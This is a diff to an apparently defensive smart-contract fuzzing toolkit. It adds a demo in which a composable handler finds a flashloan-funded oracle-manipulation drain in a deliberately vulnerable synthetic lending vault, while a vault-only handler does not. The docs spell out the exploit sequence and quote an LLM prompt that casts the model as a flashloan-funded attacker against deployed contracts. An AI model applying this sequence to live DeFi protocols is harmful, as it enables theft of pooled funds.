+// NO access to the AMM swap or the flashloan, so it cannot move the spot oracle and cannot self-fund a drain.
+contract VaultOnlyHandler {
+    Token public coll; Token public quote; MiniAMM public amm; LendingVault public vault;
+    uint256 public investedQuote;   // real quote the actor has spent acquiring collateral (its honest cost)
+    uint256 public depositedColl;
+    constructor(Token _c, Token _q, MiniAMM _a, LendingVault _v) { coll = _c; quote = _q; amm = _a; vault = _v; }
+    function _bound(uint256 x, uint256 lo, uint256 hi) internal pure returns (uint256) {
+        if (hi <= lo) return lo; return lo + (x % (hi - lo + 1));
+    }
+    // Deposit collateral the actor already legitimately holds (minted to it at setUp). Tracks the honest cost.
+    function deposit(uint256 a) public {
+        uint256 bal = coll.balanceOf(address(this));
+        if (bal == 0) return;
+        a = _bound(a, 1, bal);
+        coll.transfer(address(vault), 0);   // ABI-honest no-op; deposit transfers from us below
+        vault.deposit(a);
+        depositedColl += a;
+        investedQuote += a;                 // collateral acquired 1:1 with quote (spotPrice == 1e18 at setUp)
+    }
+    function borrow(uint256 a) public {
+        uint256 maxDebt = vault.collateral(address(this)) * amm.spotPrice() / 1e18;
+        uint256 cur = vault.debt(address(this));
+        if (maxDebt <= cur) return;
+        a = _bound(a, 1, maxDebt - cur);
+        uint256 avail = quote.balanceOf(address(vault));
+        if (a > avail) a = avail;
+        if (a == 0) return;
+        vault.borrow(a);
+    }
+    function repay(uint256 a) public {
+        uint256 d = vault.debt(address(this));
+        if (d == 0) return;
+        a = _bound(a, 1, d);
+        if (quote.balanceOf(address(this)) < a) return;
+        vault.repay(a);
+    }
+    function withdraw(uint256 a) public {
+        uint256 c = vault.collateral(address(this));
+        if (c == 0) return;
+        a = _bound(a, 1, c);
+        vault.withdraw(a);
+    }
+    // The actor's net quote position = quote held minus debt still owed. It must never exceed what it invested
+    // (no free value out of the vault). This is the SAME no-free-extraction property, restricted to vault-only.
+    function netExtracted() public view returns (uint256) {
+        uint256 held = quote.balanceOf(address(this));
+        uint256 owed = vault.debt(address(this));
+        if (held <= owed + investedQuote) return 0;
+        return held - owed - investedQuote;
+    }
+}
+
+abstract contract InvBase {
+    address[] private _targets;
+    function targetContracts() public view returns (address[] memory) { return _targets; }
+    function _target(address a) internal { _targets.push(a); }
+}
+
+contract SingleInvariantTest is InvBase {
+    Token coll; Token quote; MiniAMM amm; LendingVault vault; VaultOnlyHandler h;
+    function setUp() public {
+        coll = new Token(); quote = new Token();
+        coll.mint(address(this), 1_000_000e18); quote.mint(address(this), 1_000_000e18);
+        amm = new MiniAMM(coll, quote, 100_000e18, 100_000e18);
+        coll.transfer(address(amm), 100_000e18); quote.transfer(address(amm), 100_000e18);
+        vault = new LendingVault(coll, quote, amm);
+        quote.mint(address(vault), 200_000e18);
+        h = new VaultOnlyHandler(coll, quote, amm, vault);
+        // Fund the actor with honest collateral to deposit (its only capital). NO flashloan, NO swap access.
+        coll.mint(address(h), 10_000e18);
+        // ONLY the vault (via the handler) is a fuzz target — no AMM, no flashloan in the action surface.
+        _target(address(h));
+    }
+    // Same no-free-extraction property: the vault-only actor can never end with more quote than it invested.
+    // Without the AMM swap + flashloan it cannot inflate the oracle or self-fund, so this holds -> CLEAN.
+    function invariant_vault_not_drained() public view {
+        require(h.netExtracted() == 0, "vault drained (vault-only path should be unreachable)");
+    }
+}
+SOL
+
+# Belt-and-suspenders: confirm the composable fixture really spans all three contracts and the single one is
+# vault-only (so the split is structural, not an accident of naming).
+grep -q 'lender.flash(' "$WORK/composable.t.sol" || { note "internal: composable fixture lacks the flashloan leg" >&2; exit 3; }
+grep -q 'swapQuoteForColl(' "$WORK/composable.t.sol" || { note "internal: composable fixture lacks the AMM price move" >&2; exit 3; }
+grep -q 'flash(' "$WORK/single.t.sol" && { note "internal: single-contract fixture must NOT use the flashloan" >&2; exit 3; }
+grep -q 'swapQuoteForColl(' "$WORK/single.t.sol" && { note "internal: single-contract fixture must NOT move the AMM price" >&2; exit 3; }
+
+# Read the verdict cell out of a report's table row for the given target label.
+verdict_of() {  # $1 = report path, $2 = target label
+  _row="$(grep -F "| $2 " "$1" 2>/dev/null | tail -1 || true)"
+  printf '%s' "$_row" | awk -F'|' '{gsub(/^[ \t]+|[ \t]+$/,"",$5); print $5}'
+}
+
+# ----------------------------------------------------------------------------------------------------------
+# (A) COMPOSABLE: target + dex + flashloan roles, the cross-contract handler -> FINDING + a shrunk witness.
+# ----------------------------------------------------------------------------------------------------------
+note "leg A (COMPOSABLE): --fork-target target/dex/flashloan + cross-contract handler -> the fuzzer composes"
+note "  flashloan -> inflate spot price on the AMM -> borrow against the overvalued collateral -> swap back ->"
+note "  repay -> keep the surplus, breaking invariant_vault_not_drained (the verdict is the fuzzer's) ..."
+"$RUNNER" --repo "$WORK/repo" --target "LendingVault.sol:LendingVault" --class "C-oracle-manip" \
+          --handler-fixture "$WORK/composable.t.sol" --backend mock \
+          --match invariant_vault_not_drained \
+          --fork-target "target=$VAULT_ADDR" --fork-target "dex=$AMM_ADDR" --fork-target "flashloan=$LENDER_ADDR" \
+          --runs 256 --depth 64 --seed "$SEED" --out "$WORK/compose-out" >"$WORK/compose.log" 2>&1
+ARC=$?
+AREPORT="$WORK/compose-out/invariant-report.md"
+if [ "$ARC" -ne 0 ] || [ ! -f "$AREPORT" ]; then
+  bad "run-invariant-hunt.sh did not complete on the composable leg (exit $ARC); log:"
+  sed 's/^/        | /' "$WORK/compose.log" 2>/dev/null | tail -25
+else
+  AV="$(verdict_of "$AREPORT" "LendingVault.sol:LendingVault")"
+  if [ "$AV" = "FINDING" ]; then
+    ok "COMPOSABLE -> FINDING (the fuzzer composed a CROSS-CONTRACT exploit sequence; verdict is the fuzzer's)"
+    if grep -q '## Shrunk exploit call-sequence' "$AREPORT" && grep -qE 'flashAndSwap\(|swapQuoteForColl\(|borrow\(|swapCollForQuote\(' "$AREPORT"; then
+      ok "  witness present: a non-empty shrunk CROSS-CONTRACT call-sequence (spans flashloan + AMM + vault)"
+      note "  the shrunk cross-contract exploit sequence the fuzzer found:"
+      sed -n '/```/,/```/p' "$AREPORT" | sed '/```/d' | sed 's/^/        | /'
+    else
+      bad "  FINDING but no non-empty cross-contract shrunk sequence in the report"
+      sed 's/^/        | /' "$AREPORT" 2>/dev/null | tail -20
+    fi
+  else
+    bad "COMPOSABLE leg expected FINDING, got '${AV:-<no row>}'"
+    sed 's/^/        | /' "$WORK/compose.log" 2>/dev/null | tail -25
+  fi
+fi
+
+# ----------------------------------------------------------------------------------------------------------
+# (B) SINGLE-CONTRACT: only the vault as target, a vault-only handler, SAME budget/seed -> CLEAN (unreachable).
+# ----------------------------------------------------------------------------------------------------------
+note "leg B (SINGLE-CONTRACT): only the vault target, a vault-only handler (NO AMM swap, NO flashloan), the"
+note "  SAME fuzz budget + seed -> the exploit is structurally unreachable -> CLEAN (proving composability is"
+note "  the lift, not the budget) ..."
+"$RUNNER" --repo "$WORK/repo" --target "LendingVault.sol:LendingVault" --class "C-oracle-manip" \
+          --handler-fixture "$WORK/single.t.sol" --backend mock \
+          --match invariant_vault_not_drained \
+          --fork-target "target=$VAULT_ADDR" \
+          --runs 256 --depth 64 --seed "$SEED" --out "$WORK/single-out" >"$WORK/single.log" 2>&1
+BRC=$?
+BREPORT="$WORK/single-out/invariant-report.md"
+if [ "$BRC" -ne 0 ] || [ ! -f "$BREPORT" ]; then
+  bad "run-invariant-hunt.sh did not complete on the single-contract leg (exit $BRC); log:"
+  sed 's/^/        | /' "$WORK/single.log" 2>/dev/null | tail -25
+else
+  BV="$(verdict_of "$BREPORT" "LendingVault.sol:LendingVault")"
+  if [ "$BV" = "CLEAN" ]; then
+    ok "SINGLE-CONTRACT -> CLEAN (the same fuzzed search could not reach the exploit without composing the"
+    ok "  DEX + flashloan — the exploit is structurally invisible to single-contract fuzzing)"
+  else
+    bad "SINGLE-CONTRACT leg expected CLEAN, got '${BV:-<no row>}'"
+    sed 's/^/        | /' "$WORK/single.log" 2>/dev/null | tail -25
+  fi
+fi
+
+echo
+echo "=================================================================================="
+if [ "$FAILS" -eq 0 ]; then
+  note "PROVEN (FM2, #1041): the COMPOSABLE handler (target + dex + flashloan) -> FINDING with a shrunk"
+  note "CROSS-CONTRACT witness (flashloan -> inflate the AMM spot price -> borrow against the overvalued"
+  note "collateral -> swap back -> repay -> keep the surplus), and the SINGLE-CONTRACT handler over the SAME"
+  note "budget + seed -> CLEAN. The A-FINDING / B-CLEAN split proves cross-contract COMPOSABILITY is the lift —"
+  note "single-contract invariant fuzzing is structurally blind to the flashloan-funded oracle-manipulation"
+  note "drain. The verdict is the FUZZER's exit code (no LLM — a deterministic fixture). This composes with FM1"
+  note "fork mode (a real run pairs --fork-url with multiple --fork-target roles). A FINDING is a LEAD a human"
+  note "triages — this colony never auto-submits."
+  exit 0
+fi
+note "DEMO FAILED — the composability split did not hold" >&2
+exit 1

--- a/dark-factory/docs/invariant-hunt.md
+++ b/dark-factory/docs/invariant-hunt.md
@@ -45,9 +45,10 @@ judged by the fuzzer), never executed as shell. The test only ever reaches `forg
 |---|---|
 | [`auditor/agents/invariant-prover.ag`](../auditor/agents/invariant-prover.ag) | Per-target substrate agent: GENERATE the test (fixture or `prompt()`), VERIFY it with the fuzzing gate, `emit`/`learn` the verdict, print `INVARIANT\|<target>\|<verdict>` + the shrunk sequence on a FINDING. |
 | [`evm-harness/forge-invariant.sh`](../evm-harness/forge-invariant.sh) | The callable gate: runs Foundry's stateful invariant fuzzer over a `*.t.sol`, parses the JSON, returns FINDING (+ the shrunk sequence) / CLEAN / HARNESS_ERROR. |
-| [`run-invariant-hunt.sh`](../run-invariant-hunt.sh) | Operator entrypoint: drive `invariant-prover.ag` once over the substrate on one target, collect the verdict + any exploit sequence into a report. Threads `--fork-url`/`--fork-block`/`--fork-target` for FM1 fork mode (#1041). |
+| [`run-invariant-hunt.sh`](../run-invariant-hunt.sh) | Operator entrypoint: drive `invariant-prover.ag` once over the substrate on one target, collect the verdict + any exploit sequence into a report. Threads `--fork-url`/`--fork-block`/`--fork-target` for FM1 fork mode and the repeatable `--fork-target <role>=<addr>` context set for FM2 composability (#1041). |
 | [`demo-invariant-hunt.sh`](../demo-invariant-hunt.sh) | Offline-deterministic demo: the full target → fixture-handler → REAL Foundry fuzzer → verdict loop, asserting a vulnerable vault → FINDING (with a non-empty shrunk sequence) and a hardened twin → CLEAN. |
 | [`demo-fork-hunt.sh`](../demo-fork-hunt.sh) | FM1 (#1041) foundation proof: forks the REAL deployed WETH at a pinned mainnet block via a public RPC and asserts the funded-handler solvency invariant → CLEAN (the machinery ran against real forked state) + a forced-bad RPC → HARNESS_ERROR. `[SKIP]`s without forge or a reachable RPC. |
+| [`demo-composability.sh`](../demo-composability.sh) | FM2 (#1041) proof: a synthetic three-contract system (MiniAMM + LendingVault + FlashLender) where the COMPOSABLE handler (target + dex + flashloan roles) finds a flashloan-funded oracle-manipulation drain → FINDING (with a cross-contract shrunk witness) while the SINGLE-CONTRACT (vault-only) handler over the same budget/seed → CLEAN — the split proves composability is the lift. `[SKIP]`s without forge/agentis. |
 
 It mirrors the per-candidate structure of [`run-symbolic.sh`](../run-symbolic.sh) +
 [`auditor/agents/symbolic-prover.ag`](../auditor/agents/symbolic-prover.ag) — env-in the target, generate,
@@ -142,6 +143,67 @@ The foundation proof, [`demo-fork-hunt.sh`](../demo-fork-hunt.sh), forks the REA
 (`WETH.totalSupply() <= address(WETH).balance`) holds → **`CLEAN`** (the machinery ran against real forked
 state). It `[SKIP]`s + exits 0 when forge is absent or no public RPC is reachable.
 
+## Cross-contract composability — flashloan-funded value extraction (FM2, #1041)
+
+Fork mode (FM1) fuzzes the **real deployed target**, but still as **one contract**. The highest-value bug
+class lives *between* contracts: **flashloan-funded cross-contract value extraction** — the canonical
+oracle/price-manipulation exploit. A single-contract invariant fuzzer is **structurally blind** to it: it
+never composes a sequence that touches the DEX the target reads its price from, or the flashloan source that
+funds the attack. FM2 lets the handler compose call-SEQUENCES across the target **and the protocols it
+interacts with**.
+
+```
+run-invariant-hunt.sh … --fork-target target=<addr> --fork-target dex=<addr> --fork-target flashloan=<addr>
+        └─ FORK_CONTEXT = "target=<addr>;dex=<addr>;flashloan=<addr>"  ->  the prover's composability prompt
+```
+
+- **`--fork-target '<role>=<addr>'`** (`run-invariant-hunt.sh` / `run-autonomous-hunt.sh`, **repeatable**) — a
+  **context set** of deployed contracts the handler may compose calls across. `role` ∈ {`target`, `dex`,
+  `flashloan`, `oracle`, …} (charset `[a-z0-9_]`); `<addr>` is validated as `0x` + 40 hex. A role may not
+  repeat. A bare `--fork-target <addr>` (no `=`) stays the **FM1 one-target shorthand** (role defaults to
+  `target`, also sets `FORK_TARGET`).
+- **`FORK_CONTEXT`** — the role→address set exported to the prover, encoded as a **semicolon-separated
+  `role=addr` list** (e.g. `target=0x…;dex=0x…;flashloan=0x…`). Parse-safe after validation (no shell metachar
+  in either field). **Additive:** a `FORK_CONTEXT` with only the `target` role (or empty) leaves the prover's
+  FM1/single-target generation prompt **byte-identical** — the composability extension fires only when the set
+  carries **more than one role**.
+- **The attacker model in the prompt.** In composability mode `invariant-prover.ag`'s generation prompt tells
+  the LLM: *"you may compose calls across these deployed contracts [role→address list]; model an attacker
+  funded by a flashloan from `<flashloan>` (or `vm.deal` if none); move price via `<dex>`; generate a Handler
+  whose actions span all of them, and a deep invariant checking the TARGET's value/solvency after the
+  cross-contract sequence — NO free value extraction (an attacker who starts and ends with the same external
+  position must not have increased the target's debt to them / drained its reserves)."* The `HANDLER_FIXTURE`
+  path stays authoritative; the `FORK_CONTEXT` addresses reach the prompt as **plain text** (never a shell),
+  and anything passed to the gate is `shell_escape`d at the call site.
+
+**Composability ≠ fork — they COMPOSE.** FM1 proved fork (the real deployed WETH); FM2 proves cross-contract
+composition. The synthetic [`demo-composability.sh`](../demo-composability.sh) deploys its three contracts
+**locally** (no RPC) to demonstrate the mechanism in isolation — a `--fork-target <role>=<addr>` does **not**
+require `--fork-url`. A real run pairs the two: `--fork-url <rpc>` to fork the live state **plus** multiple
+`--fork-target` roles for the deployed DEX / flashloan / oracle the target composes with.
+
+The proof, [`demo-composability.sh`](../demo-composability.sh), builds a synthetic system that **genuinely
+encodes** the exploit: a `MiniAMM` (constant-product `x*y=k`, whose `swap` moves the collateral spot price), a
+`LendingVault` that prices deposited collateral at the AMM **spot** price (the manipulable-oracle bug) and
+lends quote against it, and a `FlashLender` (lend + require same-tx repayment). It runs two configs through
+`run-invariant-hunt.sh` over the **same** fuzz budget + seed:
+
+- **(A) composable** — `--fork-target target=<vault> --fork-target dex=<amm> --fork-target flashloan=<lender>`
+  with a handler whose actions span all three (`flashAndSwap` / `borrowMax` / `swapBack` / `repay`) → **FINDING**.
+  The fuzzer composes the cross-contract sequence (flashloan → swap to inflate the collateral spot price →
+  borrow against the now-overvalued collateral → swap back → repay → keep the surplus) and breaks
+  `invariant_vault_not_drained` (the vault is left under-collateralised). The break reason is a **real value
+  extraction** (`stolen != 0`), not a hard-coded assert, and the shrunk cross-contract witness is surfaced.
+- **(B) single-contract** — only the vault as target, a handler restricted to vault-only calls
+  (deposit/borrow/repay/withdraw), **same budget + seed** → **CLEAN**. Without the AMM swap and the flashloan
+  the actor cannot move the oracle or self-fund, so the exploit is **structurally unreachable** (the search
+  exercises the full budget — 256 runs × 64 depth, thousands of calls, hundreds of LTV reverts — and the
+  invariant holds).
+
+The **A-FINDING / B-CLEAN split proves composability is the lift** — not the budget, not the invariant. The
+verdict is the **fuzzer's exit code** (a deterministic `HANDLER_FIXTURE`; no LLM). A FINDING here is a **LEAD a
+human triages** — this colony never auto-submits.
+
 ## Run it
 
 ```bash
@@ -164,6 +226,14 @@ dark-factory/run-invariant-hunt.sh \
   --repo "$PWD/target" --target Vault.sol:Vault --class C-erc4626 \
   --fork-url https://ethereum-rpc.publicnode.com --fork-block 25318855 \
   --fork-target 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2 \
+  --backend flat-cyborg --runs 256 --depth 64 --seed 1 --out "$PWD/invariant-out"
+
+# FM2 (#1041) composability: compose calls across a context set (target + dex + flashloan roles)
+dark-factory/demo-composability.sh   # proof: composable -> FINDING, single-contract -> CLEAN; SKIPs w/o forge
+dark-factory/run-invariant-hunt.sh \
+  --repo "$PWD/target" --target Vault.sol:Vault --class C-oracle-manip \
+  --fork-url https://mainnet.example/rpc --fork-block 25318855 \
+  --fork-target target=0xVAULT --fork-target dex=0xAMM --fork-target flashloan=0xLENDER \
   --backend flat-cyborg --runs 256 --depth 64 --seed 1 --out "$PWD/invariant-out"
 ```
 

--- a/dark-factory/evm-harness/forge-invariant.sh
+++ b/dark-factory/evm-harness/forge-invariant.sh
@@ -60,6 +60,11 @@ while [ $# -gt 0 ]; do
     --seed)   SEED="${2:-}"; shift 2 ;;
     --fork-url)   FORK_URL="${2:-}"; shift 2 ;;
     --fork-block) FORK_BLOCK="${2:-}"; shift 2 ;;
+    # FM2 (#1041): --fork-context <role=addr;...> is a GENERATION-PROMPT hint (the composability context set the
+    # prover reads). The fuzzer auto-discovers its fuzz targets from the test's `targetContracts()` view, so the
+    # gate itself needs nothing from the context — it ACCEPTS and IGNORES the flag so a composability-mode caller
+    # (run-invariant-hunt.sh / the prover-gate wrapper) can forward it uniformly without an "unknown arg" error.
+    --fork-context) shift 2 ;;
     -h|--help) usage; exit 0 ;;
     *) echo "forge-invariant: unknown arg $1" >&2; exit 2 ;;
   esac

--- a/dark-factory/run-autonomous-hunt.sh
+++ b/dark-factory/run-autonomous-hunt.sh
@@ -51,6 +51,12 @@
 #                     of a fresh deploy. Forwarded to the gate's --fork-url. Absent => no fork (byte-identical).
 #                     A fork RPC failure -> HARNESS_ERROR (dry), never a false confirmed/refuted.
 #   --fork-block <n>  FM1 (#1041): pin the fork to a block number for REPRODUCIBILITY (requires --fork-url).
+#   --fork-target <spec>  FM2 (#1041): a deployed contract in the COMPOSABILITY context set. REPEATABLE. Either
+#                     a bare `<addr>` (FM1 shorthand, role `target`) or `<role>=<addr>` (role in {target, dex,
+#                     flashloan, oracle, ...}). The whole set is forwarded to the coordinator's chosen
+#                     invariant-hunt as FORK_CONTEXT (a semicolon-separated `role=addr` list) so a `--pattern-
+#                     store` prover-gate run can compose calls across the deployed protocols. Role charset
+#                     [a-z0-9_]; each address 0x + 40 hex. Absent any role beyond `target` => FM1 byte-identical.
 #   --steps N         Loop step bound (default 2): one decision routes the candidate to invariant-hunt; the
 #                     next attributes its outcome to the policy (proving outcome -> policy evolution).
 #   --out <dir>       Output dir for the run (default: ./autonomous-hunt-out). A fresh agentis store is built
@@ -85,6 +91,9 @@ DEPTH=""
 SEED=""
 FORK_URL=""
 FORK_BLOCK=""
+# FM2 (#1041): the composability context set — one `--fork-target '<role>=<addr>'` per array slot. A bare
+# `--fork-target <addr>` (FM1 shorthand, no '=') is normalised to a `target=<addr>` slot below.
+FORK_TARGET_SPECS=()
 STEPS_N=2
 STEPS_SET=0
 OUT="$PWD/autonomous-hunt-out"
@@ -110,6 +119,7 @@ while [ $# -gt 0 ]; do
     --seed)      need "$#"; SEED="$2"; shift 2 ;;
     --fork-url)  need "$#"; FORK_URL="$2"; shift 2 ;;
     --fork-block) need "$#"; FORK_BLOCK="$2"; shift 2 ;;
+    --fork-target) need "$#"; FORK_TARGET_SPECS+=("$2"); shift 2 ;;
     --steps)     need "$#"; STEPS_N="$2"; STEPS_SET=1; shift 2 ;;
     --out)       need "$#"; OUT="$2"; shift 2 ;;
     --pattern-store) need "$#"; PATTERN_STORE="$2"; shift 2 ;;
@@ -136,6 +146,32 @@ case "$FORK_URL" in
 esac
 case "$FORK_BLOCK" in '') ;; *[!0-9]*) echo "run-autonomous-hunt.sh: --fork-block must be a whole number" >&2; exit 2 ;; esac
 [ -z "$FORK_BLOCK" ] || [ -n "$FORK_URL" ] || { echo "run-autonomous-hunt.sh: --fork-block requires --fork-url" >&2; exit 2; }
+
+# FM2 (#1041): resolve the repeatable --fork-target specs into the FORK_CONTEXT role->address set (mirrors
+# run-invariant-hunt.sh). Each spec is `<role>=<addr>` or a bare `<addr>` (FM1 shorthand -> role `target`).
+# Validate each address (0x + 40 hex) and role ([a-z0-9_]); a role may not repeat. The encoding forwarded to
+# the coordinator is a semicolon-separated `role=addr` list (parse-safe). Absent any --fork-target it stays "".
+FORK_CONTEXT=""
+fork_ctx_has_role() {  # $1 = role -> 0 if FORK_CONTEXT already carries `<role>=`
+  case ";$FORK_CONTEXT;" in *";$1="*) return 0 ;; *) return 1 ;; esac
+}
+for spec in ${FORK_TARGET_SPECS+"${FORK_TARGET_SPECS[@]}"}; do
+  case "$spec" in
+    *=*) _role="${spec%%=*}"; _addr="${spec#*=}" ;;
+    *)   _role="target"; _addr="$spec" ;;
+  esac
+  case "$_role" in
+    '' ) echo "run-autonomous-hunt.sh: --fork-target role must be non-empty (got: $spec)" >&2; exit 2 ;;
+    *[!a-z0-9_]*) echo "run-autonomous-hunt.sh: --fork-target role must match [a-z0-9_] (got: $_role)" >&2; exit 2 ;;
+  esac
+  case "$_addr" in
+    0x*) _hex="${_addr#0x}"; case "$_hex" in *[!0-9a-fA-F]*) _bad=1 ;; *) [ "${#_hex}" -eq 40 ] && _bad=0 || _bad=1 ;; esac ;;
+    *) _bad=1 ;;
+  esac
+  [ "${_bad:-1}" -eq 0 ] || { echo "run-autonomous-hunt.sh: --fork-target address must be 0x + 40 hex (got: $_addr)" >&2; exit 2; }
+  fork_ctx_has_role "$_role" && { echo "run-autonomous-hunt.sh: --fork-target role '$_role' given more than once" >&2; exit 2; }
+  if [ -z "$FORK_CONTEXT" ]; then FORK_CONTEXT="$_role=$_addr"; else FORK_CONTEXT="$FORK_CONTEXT;$_role=$_addr"; fi
+done
 
 # The single --repo/--target is the one-candidate `cand-0` shorthand (full M1 back-compat). It is folded into
 # the SAME candidate list the repeatable --candidate populates, so the seeding loop below treats both uniformly.
@@ -236,14 +272,16 @@ if [ -n "$PATTERN_STORE" ]; then
     # A stable trail file (the coordinator captures the wrapper's stdout/stderr into a string it discards, so
     # the prover's RECALL-INVPAT/INVPAT-LEARNED lines are persisted here for the driver to surface afterwards).
     echo "TRAIL=$(printf '%q' "$RUN/pattern-trail.log")"
-    echo 'REPO=""; TARGET=""; MATCH="invariant"; RUNS=""; DEPTH=""; SEED=""; FORK_URL=""; FORK_BLOCK=""'
+    echo 'REPO=""; TARGET=""; MATCH="invariant"; RUNS=""; DEPTH=""; SEED=""; FORK_URL=""; FORK_BLOCK=""; FORK_CONTEXT=""'
     echo 'while [ $# -gt 0 ]; do case "$1" in'
     echo '  --repo) REPO="${2:-}"; shift 2 ;; --target) TARGET="${2:-}"; shift 2 ;;'
     echo '  --match) MATCH="${2:-}"; shift 2 ;; --runs) RUNS="${2:-}"; shift 2 ;;'
     echo '  --depth) DEPTH="${2:-}"; shift 2 ;; --seed) SEED="${2:-}"; shift 2 ;;'
     # FM1 (#1041): the coordinator appends --fork-url [--fork-block] to the gate (this wrapper) in fork mode.
     # Capture them and forward to the prover as FORK_URL/FORK_BLOCK so it threads them into the REAL gate.
+    # FM2 (#1041): --fork-context <role=addr;...> is the composability context set forwarded to the prover.
     echo '  --fork-url) FORK_URL="${2:-}"; shift 2 ;; --fork-block) FORK_BLOCK="${2:-}"; shift 2 ;;'
+    echo '  --fork-context) FORK_CONTEXT="${2:-}"; shift 2 ;;'
     echo '  *) shift ;; esac; done'
     # The candidate class the coordinator routes. The orchestrate loop's PENDING cells all carry the run-level
     # class (the SCOPE class, C1), so the prover keys its invpat:latest:<class> recall/persist on it across runs.
@@ -257,7 +295,7 @@ if [ -n "$PATTERN_STORE" ]; then
     echo '{'
     echo '  echo "llm.backend = mock"'
     echo '  echo "trace.level = normal"'
-    echo '  echo "exec.env_passthrough = TARGET_FN,TARGET_CLASS,INV_REPO,INV_OUT,INV_MATCH,HANDLER_FIXTURE,CODE_PATH,INV_RUNS,INV_DEPTH,INV_SEED,FORGE_INVARIANT,FORK_URL,FORK_BLOCK,FORK_TARGET"'
+    echo '  echo "exec.env_passthrough = TARGET_FN,TARGET_CLASS,INV_REPO,INV_OUT,INV_MATCH,HANDLER_FIXTURE,CODE_PATH,INV_RUNS,INV_DEPTH,INV_SEED,FORGE_INVARIANT,FORK_URL,FORK_BLOCK,FORK_TARGET,FORK_CONTEXT"'
     echo '  echo "exec.default_timeout_ms = 600000"'
     echo '  echo "learning.enabled = true"'
     echo '  echo "experience.enabled = true"'
@@ -273,7 +311,7 @@ if [ -n "$PATTERN_STORE" ]; then
     echo 'INV_OUT="$REPO_IN_WORK/test/Inv_gate.t.sol"'
     echo 'OPT=""; [ -n "$RUNS" ] && OPT="$OPT --runs $RUNS"; [ -n "$DEPTH" ] && OPT="$OPT --depth $DEPTH"; [ -n "$SEED" ] && OPT="$OPT --seed $SEED"'
     echo 'LOG="$WORK/prover.log"'
-    echo '( cd "$WORK" && env TARGET_FN="$TARGET" TARGET_CLASS="$CLASS" INV_REPO="$REPO_IN_WORK" INV_OUT="$INV_OUT" INV_MATCH="$MATCH" HANDLER_FIXTURE="$WORK/handler-fixture.t.sol" CODE_PATH="" INV_RUNS="$RUNS" INV_DEPTH="$DEPTH" INV_SEED="$SEED" FORK_URL="$FORK_URL" FORK_BLOCK="$FORK_BLOCK" FORK_TARGET="" FORGE_INVARIANT="$WORK/forge-invariant.sh" "$AGENTIS" go invariant-prover.ag --enable-exec --enable-messaging ) >"$LOG" 2>&1 || true'
+    echo '( cd "$WORK" && env TARGET_FN="$TARGET" TARGET_CLASS="$CLASS" INV_REPO="$REPO_IN_WORK" INV_OUT="$INV_OUT" INV_MATCH="$MATCH" HANDLER_FIXTURE="$WORK/handler-fixture.t.sol" CODE_PATH="" INV_RUNS="$RUNS" INV_DEPTH="$DEPTH" INV_SEED="$SEED" FORK_URL="$FORK_URL" FORK_BLOCK="$FORK_BLOCK" FORK_TARGET="" FORK_CONTEXT="$FORK_CONTEXT" FORGE_INVARIANT="$WORK/forge-invariant.sh" "$AGENTIS" go invariant-prover.ag --enable-exec --enable-messaging ) >"$LOG" 2>&1 || true'
     # Surface the prover trail (incl. RECALL-INVPAT / INVPAT-LEARNED) to stderr AND append it to the stable
     # trail file the driver reads back (the coordinator discards the captured exec output, so the trail file is
     # the durable channel for the prover's recall/persist evidence).
@@ -316,7 +354,7 @@ fi
   [ "$BACKEND" = "claude" ] && { echo "llm.command = claude"; echo "llm.args = -p"; echo "llm.cli_timeout_ms = 600000"; }
   [ "$BACKEND" = "flat-cyborg" ] && echo "llm.cli_timeout_ms = 600000"
   echo "trace.level = normal"
-  echo "exec.env_passthrough = SCOPE,CLASS_FITNESS,POLICY,PENDING,BUDGET,DRY_STREAK,DRY_CAP,PREV_ACTION,PREV_KEY,LAST_OUTCOME,DISPATCH_ENABLED,DISPATCH_FIXTURE,HUNT_FIXTURE,ORCHESTRATE_ENABLED,STEPS,SYM_POLICY_TT,INV_POLICY_TT,SYM_REPO,SYM_SPEC,SYM_FUNCTION,HALMOS_VERIFY,FORGE_INVARIANT,INV_REPO,INV_TARGET,INV_MATCH,INV_RUNS,INV_DEPTH,INV_SEED,INV_FORK_URL,INV_FORK_BLOCK"
+  echo "exec.env_passthrough = SCOPE,CLASS_FITNESS,POLICY,PENDING,BUDGET,DRY_STREAK,DRY_CAP,PREV_ACTION,PREV_KEY,LAST_OUTCOME,DISPATCH_ENABLED,DISPATCH_FIXTURE,HUNT_FIXTURE,ORCHESTRATE_ENABLED,STEPS,SYM_POLICY_TT,INV_POLICY_TT,SYM_REPO,SYM_SPEC,SYM_FUNCTION,HALMOS_VERIFY,FORGE_INVARIANT,INV_REPO,INV_TARGET,INV_MATCH,INV_RUNS,INV_DEPTH,INV_SEED,INV_FORK_URL,INV_FORK_BLOCK,INV_FORK_CONTEXT"
   # A forge invariant run (build + a few hundred fuzzed sequences) far exceeds the 10s/30s defaults — match
   # run-invariant-hunt.sh's 600s budget so the live fuzzer has room to run inside the loop.
   echo "exec.default_timeout_ms = 600000"
@@ -405,6 +443,7 @@ RUN_LOG="$RUN/orchestrate.log"
     INV_SEED="$SEED" \
     INV_FORK_URL="$FORK_URL" \
     INV_FORK_BLOCK="$FORK_BLOCK" \
+    INV_FORK_CONTEXT="$FORK_CONTEXT" \
     "$AGENTIS" go coordinator.ag --enable-exec --enable-messaging ) >"$RUN_LOG" 2>&1 \
   || { echo "run-autonomous-hunt.sh: in-substrate autonomous hunt failed (see $RUN_LOG)" >&2; exit 1; }
 

--- a/dark-factory/run-invariant-hunt.sh
+++ b/dark-factory/run-invariant-hunt.sh
@@ -44,9 +44,20 @@
 #                        handler/invariant can reference the deployed contract by address. Absent => no fork
 #                        (byte-identical to today). A fork RPC failure -> HARNESS_ERROR, never a false verdict.
 #   --fork-block <n>     FM1 (#1041): pin the fork to a block number for REPRODUCIBILITY (requires --fork-url).
-#   --fork-target <addr> FM1 (#1041): the deployed contract address the generated test should drive against the
-#                        forked state. Exported as FORK_TARGET so invariant-prover.ag references the LIVE
-#                        deployed contract by address (the proven POC shape). Optional; "" leaves it to the test.
+#   --fork-target <spec> FM1/FM2 (#1041): a deployed contract the generated test should drive. REPEATABLE. Two
+#                        forms:
+#                          * FM1 shorthand `--fork-target <addr>` (a bare 0x-address, no '=') — the single
+#                            target the prover references as FORK_TARGET (the proven POC shape).
+#                          * FM2 composability `--fork-target '<role>=<addr>'` — a ROLE in a CONTEXT SET of
+#                            deployed contracts the handler may compose calls ACROSS (role in {target, dex,
+#                            flashloan, oracle, ...}). Roles are charset [a-z0-9_]; each address is 0x + 40 hex.
+#                            The whole set is exported to the prover as FORK_CONTEXT (a semicolon-separated
+#                            `role=addr` list) so the generation prompt can model a flashloan-funded attacker
